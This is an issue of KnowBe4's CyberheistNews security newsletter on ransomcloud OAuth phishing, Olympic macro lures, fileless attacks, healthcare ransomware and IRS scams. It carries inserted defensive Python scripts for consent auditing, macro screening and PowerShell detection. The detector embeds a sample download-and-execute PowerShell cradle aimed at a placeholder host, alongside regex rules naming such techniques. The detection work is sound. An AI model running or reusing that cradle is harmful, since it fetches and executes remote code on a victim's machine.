CyberheistNews Vol 8 #3 [Heads-up] Unusual Ransomware Strain Encrypts Cloud Email Real-Time VIDEO


OK, here is something unusual and really scary.

KnowBe4's Chief Hacking Officer Kevin Mitnick called me with some chilling news. A white hat hacker friend of his developed a working "ransomcloud" strain, which encrypts cloud email accounts like Office 365 in real time. My first thought was: "Holy $#!+".

I asked him, "Can you show it to me?" Kevin sent me a video demo, which you can see below. Lucky for us, this type of ransomware strain is not in the wild at the moment.

When I started looking into it, I found that the proof of concept he mentions in the video has been around for a while. Even so, it's on the horizon, because if a white hat can do this, so can a black hat. I am wondering why they haven't already, because it's not all that hard to do.

This strain uses a smart social engineering tactic to trick the user into giving the bad guys access to their cloud email account, with the ruse of a "new Microsoft anti-spam service".

Once your employee clicks "accept" to use this service, it's game over: all email and attachments are encrypted in real time! The ransomcloud attack will work against any cloud email provider that lets an application take control of the mailbox via OAuth. With Google it will work if you get the app past their verification process. Outlook365 doesn't verify the app at this point, so it's much easier.
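The weak point here is the OAuth consent itself, so the defender's first job is to find out which third-party apps already hold mailbox write permissions and who consented to them. The script below is an added example (not KnowBe4's code or anything from the video): it triages a list of consent grants whose shape imitates Microsoft Graph `oauth2PermissionGrants` records. The grant data, app names, GUIDs and the approved-app allow-list are all constructed for the example.

```python
"""Triage OAuth2 consent grants for mailbox-write risk (added example).

The grant records below are constructed sample data that imitate the
shape of Microsoft Graph `oauth2PermissionGrants` objects (clientId,
consentType, principalId, scope). App names, GUIDs and the approved-app
allow-list are hypothetical.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Delegated scopes that let an app rewrite or delete mailbox contents.
# A "ransomcloud" app needs write access to replace mail with encrypted
# copies; read-only scopes cannot do that, so they rank lower.
MAIL_WRITE_SCOPES = {"Mail.ReadWrite", "Mail.ReadWrite.Shared",
                     "MailboxSettings.ReadWrite", "Mail.Send"}
MAIL_READ_SCOPES = {"Mail.Read", "Mail.Read.Shared"}

# Hypothetical allow-list of client IDs the tenant has actually vetted.
APPROVED_APPS = {"11111111-1111-1111-1111-111111111111"}


@dataclass
class Grant:
    client_id: str
    client_name: str
    consent_type: str            # "AllPrincipals" (admin) or "Principal" (one user)
    principal_id: Optional[str]  # user object ID for "Principal" grants
    scope: str                   # space-separated scopes, as Graph returns them


# Constructed sample: one vetted app, one user-consented "anti-spam" app
# with full mailbox write access, one read-only calendar integration.
SAMPLE_GRANTS: List[Grant] = [
    Grant("11111111-1111-1111-1111-111111111111", "Corp Signature Tool",
          "AllPrincipals", None, "Mail.ReadWrite User.Read"),
    Grant("22222222-2222-2222-2222-222222222222", "Microsoft Anti-Spam Service",
          "Principal", "user-0042", "Mail.ReadWrite Mail.Send offline_access"),
    Grant("33333333-3333-3333-3333-333333333333", "Room Booking",
          "Principal", "user-0007", "Calendars.Read User.Read"),
]


def risk_of(grant: Grant) -> str:
    """Rank one grant: approved / high / medium / low."""
    if grant.client_id in APPROVED_APPS:
        return "approved"
    scopes = set(grant.scope.split())
    if scopes & MAIL_WRITE_SCOPES:
        return "high"
    if scopes & MAIL_READ_SCOPES:
        return "medium"
    return "low"


def triage(grants: List[Grant]) -> Dict[str, str]:
    """Map each app name to its risk rating."""
    return {g.client_name: risk_of(g) for g in grants}


def users_exposed(grants: List[Grant]) -> List[str]:
    """Users who personally consented to an unapproved app with mail write access.

    These consents are the ones to revoke first; "AllPrincipals" grants were
    approved by an admin and are reviewed separately.
    """
    return sorted(g.principal_id for g in grants
                  if risk_of(g) == "high" and g.consent_type == "Principal"
                  and g.principal_id)


if __name__ == "__main__":
    for name, risk in triage(SAMPLE_GRANTS).items():
        print(f"{risk:9} {name}")
    print("revoke first:", users_exposed(SAMPLE_GRANTS))
```

The rating keys on the scope string rather than the app's display name, because the display name is exactly what the ruse controls. In a real tenant you would feed the output of a consent-grant export into `triage` and pair it with a policy that routes user consent requests through an admin.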

See it for realz here (video is just 5 minutes) and shiver:

Phishing the Olympics - Is Basketball Next?

McAfee turned up a good example of plausible, well-timed phishbait over last weekend. A malicious Word document was circulated to South Korean targets interested in the upcoming Winter Olympics, particularly targets involved with hockey.

The spoofed email appeared to come from "," an email address belonging to the Republic of Korea's National Counter-Terrorism Center (NCTC).

The timing coincided with pre-Olympic drills the NCTC was actually holding around Pyeongchang, so receiving an Olympic-themed email from them would be unlikely to arouse suspicion.

The organizations, mostly corporations, that were blind-copied had some involvement with the Winter Olympics. The email carried a document entitled, "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics." The document contains an obfuscated Visual Basic macro.

The recipient is advised to "enable content" so the document is visible in their version of Microsoft Word. Should they enable content, they will execute a PowerShell script steganographically hidden in a convincing-looking logo image.
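The whole chain above depends on a macro-enabled document reaching the inbox, so one cheap control is to hold any attachment that carries a VBA project before a user ever sees the "enable content" bar. The code below is an added example (not from McAfee's report or KnowBe4): it builds minimal OOXML containers in memory as constructed samples and screens them the way a mail filter would, by inspecting the zip member list and the content-types manifest rather than trusting the file extension.

```python
"""Flag macro-enabled Office attachments before a user can "enable content".

Added example. The documents are constructed in memory as minimal OOXML
zip containers with only the members needed for the check; they are not
real Word files, just the parts a mail filter would inspect.
"""
import io
import zipfile
from typing import Dict, List

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_MEMBERS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")


def _make_docx(with_macro: bool) -> bytes:
    """Build a minimal OOXML container (constructed sample, not a real document)."""
    override = (f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
                if with_macro else "")
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     f'{override}</Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # OLE compound-file magic followed by padding; a stand-in for a VBA project
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


def macro_indicators(filename: str, data: bytes) -> List[str]:
    """Return reasons an attachment should be held for review (empty = clean).

    Checks both the zip member list and the content-types manifest, so a
    macro document renamed to .docx is still caught.
    """
    reasons: List[str] = []
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return reasons  # not OOXML; legacy .doc needs an OLE parser instead
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for member in MACRO_MEMBERS:
            if member in names:
                reasons.append(f"contains {member}")
        if "[Content_Types].xml" in names:
            manifest = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            if VBA_CONTENT_TYPE in manifest:
                reasons.append("manifest declares a VBA project")
    if reasons and filename.lower().endswith((".docx", ".xlsx", ".pptx")):
        reasons.append("macro content in a file extension that should not carry macros")
    return reasons


def screen_attachments(attachments: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Screen a mapping of filename -> bytes, returning findings per file."""
    return {name: macro_indicators(name, data) for name, data in attachments.items()}


# Constructed sample attachments: a clean file, a macro file, and the same
# macro file renamed to a .docx extension.
SAMPLE_ATTACHMENTS = {
    "agenda.docx": _make_docx(with_macro=False),
    "Olympics_invite.docm": _make_docx(with_macro=True),
    "Olympics_invite.docx": _make_docx(with_macro=True),
}

if __name__ == "__main__":
    for name, findings in screen_attachments(SAMPLE_ATTACHMENTS).items():
        print(name, "->", findings or ["clean"])
```

This catches the container, not the steganographic payload inside the logo image; that second stage only runs because the macro ran first, which is why blocking or quarantining the macro carrier (and disabling macros from the internet zone by policy) is the higher-value control.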

So this was sophisticated social engineering, with good target selection, attractive phishbait, and nice timing. Your organization might consider training for other periods when this kind of approach might be tried against you.

For example, how many of your employees do you think will be swapping, and opening, basketball-themed emails when people begin filling out their NCAA brackets come March? Strengthen your human firewall, because automated filters are unlikely to catch it all. Here is McAfee's report:

Live Webinar: Phishing Attack Landscape and Industry Benchmarking

One of your important and ongoing IT security initiatives is getting the Phish-prone percentage of your users as low as possible.

But how are you doing compared to "similar-size peers" in your industry?

We just completed a big-data analytics exercise over the 15,000 customers we have and came up with new baseline Phish-prone percentages, and how fast they drop.

The numbers are very interesting to say the least, and we are releasing them in a webinar this Thursday!

Join security experts Stu Sjouwerman, CEO at KnowBe4, and Perry Carpenter, Chief Evangelist and Strategy Officer at KnowBe4 and former Gartner Research Analyst, for this live webinar “Phishing Attack Landscape and Benchmarking” as they discuss brand-new research based on what your users are clicking. Find out how you are doing compared to your peers with new phishing benchmarks by industry.

Key topics covered in this webinar:
  • New phishing benchmark data by industry
  • Understanding the current phishing landscape
  • Most clicked simulated phishing attacks
  • Top 10 “In the Wild” reported phishing emails
  • Actionable tips to create your “human firewall”
Date/Time: Thursday, January 18th at 2:00 pm EST
Live Attendees Limited to just 2,000 -- Register Now!

Take the 2018 KnowBe4 Endpoint Protection Effectiveness Survey for a Chance to Get 500 Bucks

Ransomware, external attacks, and data breaches are all financially damaging security concerns that are a focus for IT today.

So, how are you protecting your organization from becoming a victim of these threats? In this fast, 5-minute “2018 Endpoint Protection Effectiveness Survey” online survey, we want to hear about your first-hand experience with ransomware, external attacks, and data breaches, what you’re doing to protect your organization, and just how effective your current protection strategy really is.

Every respondent completing this 5-minute survey will receive a free Kevin Mitnick lockpick business card.

Hurry and take the survey now - be one of the first 500 to take the survey and have a chance to win one of FIVE 500-DOLLAR AMEX gift cards!

Take The Survey Now:

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"Keep away from people who try to belittle your ambitions. Small people always do that, but the really great make you feel that you, too, can become great." - Mark Twain - Author (1835 - 1910)

"If you can't fly, then run; if you can't run, then walk; if you can't walk, then crawl; but whatever you do, you have to keep moving forward." - Dr. Martin Luther King Jr. (1929 - 1986)

"It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently." - Warren Buffett

Thanks for reading CyberheistNews

Security News

Ignorance: The Opposite of Bliss

Most employees confess to ignorance of their company's security policies, according to a study recently concluded by B2B Enterprises and Kaspersky Lab. Only 12% were "fully aware" of their organization's security policies. A higher but still disturbingly low 49% said they regarded cybersecurity as a shared responsibility.

Even granting that being "fully aware" of an organization's security policies may be a high bar to clear, the figures are still troubling. Clearly, the legacy approach to security awareness training, usually a once-a-year or so session with a compliance-heavy death-by-PowerPoint, is about as effective as you'd expect it to be.

For effective security awareness training that prepares employees for the threats they'll actually face, an interactive, timely, and realistic platform like KnowBe4's is worth considering. You'll find an account of this depressing study in Security Asia:

eBook Cyberheist: The BIGGEST Financial Threat Facing American Businesses

Cybercrime has gone pro over the last 5 years. Attacks have become much more sophisticated and intense. The bad guys are now going after your employees. They bypass your firewall/antivirus security software and social engineer your employees to click on a malicious link or open an infected attachment.

From that point forward they hack into your network and put keyloggers on accounting systems. You can guess the rest. A few days later the organization’s bank accounts are empty, or valuable corporate intellectual property is stolen. Another cyberheist victim. It’s happening right now, as you read this.

Cyberheist was fully updated and written for the IT team and owners / management of Small and Medium Enterprise. Want to read this bestseller? As a newsletter subscriber you can get this as a complimentary eBook, it's an instant 240-page PDF download!

Responding to the Rise of Fileless Attacks

Excellent article in DarkReading: Fileless attacks, easier to conduct and more effective than traditional malware-based threats, pose a growing challenge to enterprise targets.

Cybercriminals take the path of least resistance -- which is why more of them are adopting fileless attacks to target their victims. The threat is poised to grow as attackers recognize the ease of this method and more employees rely on mobile and cloud to do their jobs.

Fileless attacks let threat actors skip the steps involved with traditional malware-based attacks. They don't need to create payloads; they can simply abuse trusted programs that are already installed to run code in memory. In 2017, fileless malware attacks leveraging PowerShell or Windows Management Instrumentation tools made up 52% of all attacks for the year.

Yet businesses still aren't paying attention.

"Our focus in this industry is still on traditional attack vectors we've been dealing with for most of our careers," says Heath Renfrow, CISO at Leo Cyber Security.

It's time for businesses to take a closer look at how these threats work, how they can be detected, why they're predicted to grow, and the steps they can take to protect themselves.
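Since there is no file to scan, detection of these attacks comes down to watching what the trusted programs are told to do, and the PowerShell command line is the richest single source. The script below is an added example (not from the DarkReading article): it runs a handful of well-known "living off the land" indicators over constructed process-creation log lines, decoding the `-EncodedCommand` payload (which PowerShell expects as base64 over UTF-16LE) so that rules also see what was hidden inside it. The log lines and the rule names are constructed for the example.

```python
"""Triage PowerShell / WMI command lines for fileless-attack indicators.

Added example. The log lines below are constructed to imitate process-
creation records with the command line extracted; only that field is used.
"""
import base64
import re
from typing import List, Tuple

# Each rule: (name, case-insensitive regex) for a common living-off-the-land
# building block. Real detections would add parent-process and user context.
RULES = [
    ("encoded_command", r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("download_cradle", r"(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"),
    ("in_memory_exec", r"\b(?:IEX|Invoke-Expression)\b"),
    ("hidden_window", r"-(?:w|win|windowstyle)\s+hidden"),
    ("bypass_policy", r"-(?:ep|exec|executionpolicy)\s+bypass"),
    ("wmi_process_create", r"wmic(?:\.exe)?\s+.*process\s+call\s+create|Win32_Process"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if none/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(cmdline: str) -> List[str]:
    """Names of rules matched by the command line, including inside the encoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return [name for name, rx in COMPILED if rx.search(text)]


def severity(rules: List[str]) -> str:
    """Escalate when execution-from-memory and a network fetch appear together."""
    if "in_memory_exec" in rules and "download_cradle" in rules:
        return "critical"
    if len(rules) >= 2:
        return "high"
    if rules:
        return "medium"
    return "info"


def triage(lines: List[str]) -> List[Tuple[str, List[str], str]]:
    """(truncated command line, matched rules, severity) for each record."""
    out = []
    for line in lines:
        rules = analyze(line)
        out.append((line[:48], rules, severity(rules)))
    return out


def _encode(script: str) -> str:
    """Mirror PowerShell's -EncodedCommand encoding for the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a scheduled backup, a classic hidden/encoded cradle,
# a WMI-spawned process, and an interactive one-liner.
SAMPLE_ENCODED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell.exe -w hidden -ep bypass -enc " + _encode(SAMPLE_ENCODED_SCRIPT),
    'wmic.exe process call create "notepad.exe"',
    "powershell.exe Get-Process | Where-Object CPU -gt 100",
]

if __name__ == "__main__":
    for cmd, rules, sev in triage(SAMPLE_LOGS):
        print(f"{sev:8} {cmd:48} {rules}")
```

The decoding step matters more than any single regex: without it the second sample only shows as "hidden window plus encoded command", and the cradle inside stays invisible to string matching. Enabling PowerShell script block logging gives you the same decoded view from the engine itself.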

What Can You Do About It?

Protecting against phishing starts with employee education. "Trick them, test them, teach them," says Lovejoy. "The goal is to immunize enough people so the disease can't take hold." Employees should also have a means to report activity they feel is suspicious.

"Always enact the policy 'If you see something, say something,'" she adds. On top of this, businesses should take a close look at activity in their ecosystems. Full article here:

Healthcare Breaches Involving Ransomware Increase Year-Over-Year

“End of year research conducted by Cryptonite indicates that there were a total of 140 data breach events characterized and reported to HHS/OCR as IT/hacking in 2017 representing a 23.89% increase over the 113 IT/hacking events reported in 2016.”

The number of reported major IT/hacking events attributed to ransomware by healthcare institutions increased by 89% from 2016 to 2017. This was an increase from 19 reported events in 2016 to a total of 36 events in 2017.

In 2017 ransomware events represented 25% of all events reported to HHS/OCR and attributed to IT/hacking. All six of the six largest IT/hacking healthcare events reported in 2017 were attributed to ransomware.

There were 3,442,748 records reported compromised in 2017, a substantial decrease from 13,425,263 reported compromised in 2016 as cyberattackers diversified their attacks against a broader mix of healthcare entities.

In past years, cyber criminals invested considerable time and effort in targeting the largest healthcare institutions as evidenced by the 2015 events impacting Anthem (78.8 million records), Premera Blue Cross (11 million records) and by the 2016 events impacting Banner Health (3.6 million records) and Newkirk Products (3.4 million records).

This low hanging fruit has to some extent been harvested and attackers are now increasingly turning their attention to the broader mix of health care entities.

The emergence and refinement of advanced ransomware tools lowers both the cost and the time for cyberattackers to target smaller healthcare institutions – now they can cost effectively reach physician practices, surgical centers, diagnostic laboratories, MRI/CT scan centers and many other smaller yet critical healthcare institutions.

This is the beginning of a trend that will increase very substantially in 2018 and 2019. More:

Hackers increasingly target patient records as HCPs do little to protect data

One in five healthcare professionals has experienced breaches of patient data, yet many also say they’re “very confident” in their facility’s ability to protect that data against theft, according to a survey by University of Phoenix College of Health Professions.

Despite increased data breaches in all industries, only a quarter of registered nurses (RNs) have seen changes in the way their companies handle data security over the past year.

The data also reveals a worrying disconnect between healthcare professionals’ confidence in protecting sensitive patient data and the actual protection of that data.

Some 48% of RNs and 57% of administrative staff say they are "very confident" their institution can safeguard patient records against potential data theft. At the same time, only 25% of RNs and 40% of admin staff cited data security and privacy improvements over the past year. More:

Phishing the Phishers: Sneaky Crooks Put Backdoors Into Kits for Wannabe Fraudsters

You no longer need to be a skilled coder to commit cybercrime. Over the last several years a thriving criminal-to-criminal black market in phishing kits has arisen.

Script kiddies can purchase attackware-as-a-service from the Dark Web Malware Depot for their social engineering attacks. And such kits are now being offered for free. And why not? After all, don't we get a lot of legitimate services for free, too?

Well, naive criminal, not so fast. There are wheels within wheels here. People are fond of saying: "If you're not paying for the product, you are the product".

The criminals who distribute the kits build in mechanisms that quietly siphon off whatever information their criminal customers manage to steal. This means that an organization hooked by a phishing attack might well see its information shared far more widely than it had even feared. See the story in SC Magazine for more information:

Excellent Learning Resource If You Run in the Cloud

I ran into Ryan Kroonenburg at an investor day of Elephant, our Venture Capital partners. They had also invested in A Cloud Guru and Ryan is their CEO. Turns out that A Cloud Guru is growing like crazy and trains IT pros on how to create AWS architecture, and even become certified as AWS Certified Solutions Architect. I checked out their site and you should have a look at it too!

While we are talking about training for IT pros, did you know that 30% of data breaches in 2017 took advantage of software vulnerabilities and weaknesses? Stop vulnerabilities at the source and meet compliance requirements with effective hands-on Secure Developer Training from HackEDU. Learn more about this offensive "think like a hacker" training. See a demo of their excellent SQL injection training here:

IRS Issues Warning on New Tax Info Phishing Attempts

The Internal Revenue Service (IRS) has warned tax professionals that a new round of emails from cybercriminals posing as potential clients are attempting to trick practitioners into disclosing sensitive information.

The Security Summit, comprising the IRS, state tax agencies, and the tax industry, on January 9, 2018, encouraged tax practitioners to be wary of communicating solely by email with potential or even existing clients, especially if unusual requests are made.

"Data breach thefts have given thieves millions of identity data points including names, addresses, Social Security numbers, and email addresses. If in doubt, tax practitioners should call to confirm a client's identity," said the IRS.

Fraudsters are using phishing emails to trick tax professionals into opening a link or attached document by posing as potential clients. If the practitioner responds, the criminal will send a second email that contains either a phishing URL or an attached document that contains a phishing URL, claiming their tax data is enclosed.

The fraudster wants the tax professional to click on the link or attachment and then enter their credentials. In some cases, the URL or attachment might be malicious and if clicked will download malicious software onto the tax professional's computer.

"Depending on the malware involved, this scheme could give fraudsters access to the tax practitioners' secure accounts or sensitive data. It may even give the fraudster remote control of the tax professionals' computers," said the IRS.

The agency has also received reports of a scam involving cybercriminals posing as IRS e-Services, asking tax professionals to sign into their accounts and providing a disguised link. The link sends tax professionals to a fake e-Services site that steals their usernames and passwords.

The IRS reminded tax professionals that it does not send unsolicited emails. Tax practitioners receiving emails from fraudsters posing as the IRS, or even their tax software provider, should go directly to the main website, such as, rather than opening any links or attachments. Source:

Brace for the GDPR Compliance Deadline: May 2018

GDPR will be your most notable compliance challenge in 2018.

Here is an example: if anyone from the EU fills out their information on your website, you need to comply with the GDPR. That is everybody, and that means your organization needs to have someone wearing the hat of the Data Protection Officer (DPO). Guess who? Right, probably you.

The effective date is May 25 this year and it will impact every organization that handles European Union (EU) residents’ personal data, even if the data processing occurs outside EU borders.

You are going to have to do a data impact risk assessment, which is a mandatory requirement under GDPR, and this is a critical deliverable especially if your organization experiences a breach.

The best way to do a data impact risk assessment is to do your own data mapping exercise, since it is impossible to protect data when you do not know what data lives where. You need to know how it is used, how it is transmitted, and how it is destroyed (end of life), all of which may be defined by your data location and sensitivity.

Organizations must enable DPOs to manage the GDPR compliance program months before the deadline. Did your IT team start?

It is expected that most IT people in the EU responsible for compliance will be aware of and preparing for GDPR in 2018, but how about the US? Is your budget sufficient to support what is needed for compliance?

Over the last 4 years, KnowBe4 has developed KCM, KnowBe4 Compliance Manager, a cloud-based service which consolidates your audit management and regulatory compliance tasks into simple automated workflows that prevent overlap and eliminate gaps. It will help you get and stay GDPR compliant.

See how you can get audits done in half the time at half the cost: Check out the new KCM page and request a demo:

Interesting News Items This Week

‘Handle Fear By Understanding’: Q&A With KnowBe4’s Security Training Advocate Erich Kron:

WSJ: Boards Seek Bigger Role in Thwarting Hackers:

4 Steps To Launch A Security Awareness Training Program. Good article at CSO:

Seven Ways Cybercriminals Can Use Machine Learning:

VirusTotal: New VirusTotal Graph Makes It Easy to Visualize Malware:

WPA3 WiFi Standard Announced After Researchers KRACKed WPA2 Three Months Ago:

More than half of US-based employees have never heard of GDPR. They need to get trained!:

The K-12 Cyber Incident Map is a visualization of cybersecurity-related incidents reported about U.S. K-12 public schools and districts from 2016 to the present. Scary:

AI learns how to fool speech-to-text. That’s bad news for voice assistants:

Study: 45% of companies don’t have cybersecurity leader:

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
    • Here is your latest 3 min virtual vacation: SPACE! A beautiful trip through the universe from Hubble images. HD, full screen/headphones! (and while you watch this, consider this unusual definition of space: "a viewpoint of dimension".)

Copyright © 2014-2017 KnowBe4, Inc. All rights reserved.
